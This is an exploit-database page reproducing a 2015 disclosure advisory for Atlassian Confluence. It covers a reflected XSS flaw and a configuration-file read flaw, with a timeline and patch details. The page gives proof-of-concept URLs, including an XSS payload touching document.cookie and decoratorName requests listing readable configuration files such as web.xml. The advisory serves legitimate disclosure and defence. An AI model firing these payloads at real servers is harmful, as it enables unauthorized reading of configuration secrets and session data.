header-logo
Suggest Exploit
vendor:
Confluence
by:
4,3
CVSS
MEDIUM
Reflected Cross-Site Scripting, Insecure Direct Object Reference
79, 639
CWE
Product Name: Confluence
Affected Version From: 5.2, 5.9.1
Affected Version To: 5.8.14, 5.8.15
Patch Exists: YES
Related CWE: CVE-2015-8398, CVE-2015-8399
CPE: atlassian:confluence
Metasploit: https://www.rapid7.com/db/vulnerabilities/atlassian-confluence-cve-2015-8398/https://www.rapid7.com/db/vulnerabilities/atlassian-confluence-cve-2015-8399/
Other Scripts: N/A
Tags: edb,cve,cve2015,atlassian,confluence
CVSS Metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
Nuclei References: https://jira.atlassian.com/browse/CONFSERVER-39704?src=confmacrohttps://www.exploit-db.com/exploits/39170/https://nvd.nist.gov/vuln/detail/CVE-2015-8399
Nuclei Metadata: {'max-request': 1, 'shodan-query': 'http.component:"Atlassian Confluence"', 'vendor': 'atlassian', 'product': 'confluence'}
Platforms Tested: None
2015

Confluence Vulnerabilities

Atlassian Confluence before 5.8.17 contains an information disclsoure vulnerability. A remote authenticated user can read configuration files via the decoratorName parameter to (1) spaces/viewdefaultdecorator.action or (2) admin/viewdefaultdecorator.action.

Mitigation:

Upgrade to Confluence version 5.8.17
Source

Exploit-DB raw data:

[Systems Affected]
    Product              :    Confluence
    Company            :    Atlassian
    Versions (1)        :    5.2 / 5.8.14 / 5.8.15
    CVSS Score (1)  :    6.1 / Medium (classified by vendor)
    Versions (2)        :    5.9.1 / 5.8.14 / 5.8.15
    CVSS Score (2)  :    7.7 / High (classified by vendor)


[Product Description]
    Confluence is team collaboration software, where you create,
organize and discuss work with your team. it is developed and marketed
by Atlassian.


[Vulnerabilities]
    Two vulnerabilities were identified within this application:
    (1) Reflected Cross-Site Scripting (CVE-2015-8398)
    (2) Insecure Direct Object Reference (CVE-2015-8399)


[Advisory Timeline]
    26/Oct/2015 - Discovery and vendor notification
    26/Oct/2015 - Vendor replied for Cross-Site Scripting (SEC-490)
    26/Oct/2015 - Issue CONF-39689 created
    27/Oct/2015 - Vendor replied for Insecure Direct Object Reference
(SEC-491 / SEC-492)
    27/Oct/2015 - Issue CONF-39704 created
    16/Nov/2015 - Vendor confirmed that Cross-Site Scripting was fixed
    19/Nov/2015 - Vendor confirmed that Insecure Direct Object
Reference was fixed


[Patch Available]
    According to the vendor, upgrade to Confluence version 5.8.17


[Description of Vulnerabilities]
    (1) Reflected Cross-Site Scripting
        An unauthenticated reflected Cross-site scripting was found in
the REST API. The vulnerability is located at
/rest/prototype/1/session/check/ and the payload used is <img src=a
onerror=alert(document.cookie)>

        [References]
            CVE-2015-8398 / SEC-490 / CONF-39689

        [PoC]
            http://<Confluence
Server>/rest/prototype/1/session/check/something%3Cimg%20src%3da%20onerror%3dalert%28document.cookie%29%3E


    (2) Insecure Direct Object Reference
        Two instances of Insecure Direct Object Reference were found
within the application, that allows any authenticated user to read
configuration files from the application

        [References]
            CVE-2015-8399 / SEC-491 / SEC-492 / CONF-39704

        [PoC]
            http://<Confluence
Server>/spaces/viewdefaultdecorator.action?decoratorName=<FILE>
            http://<Confluence
Server>/admin/viewdefaultdecorator.action?decoratorName=<FILE>

            This is an example of accepted <FILE> parameters
            /WEB-INF/decorators.xml
            /WEB-INF/glue-config.xml
            /WEB-INF/server-config.wsdd
            /WEB-INF/sitemesh.xml
            /WEB-INF/urlrewrite.xml
            /WEB-INF/web.xml
            /databaseSubsystemContext.xml
            /securityContext.xml
            /services/statusServiceContext.xml
            com/atlassian/confluence/security/SpacePermission.hbm.xml
            com/atlassian/confluence/user/OSUUser.hbm.xml
            com/atlassian/confluence/security/ContentPermissionSet.hbm.xml
            com/atlassian/confluence/user/ConfluenceUser.hbm.xml

-- 
S3ba
@s3bap3
linkedin.com/in/s3bap3

Navigation

Suggest Exploit

Services By CQR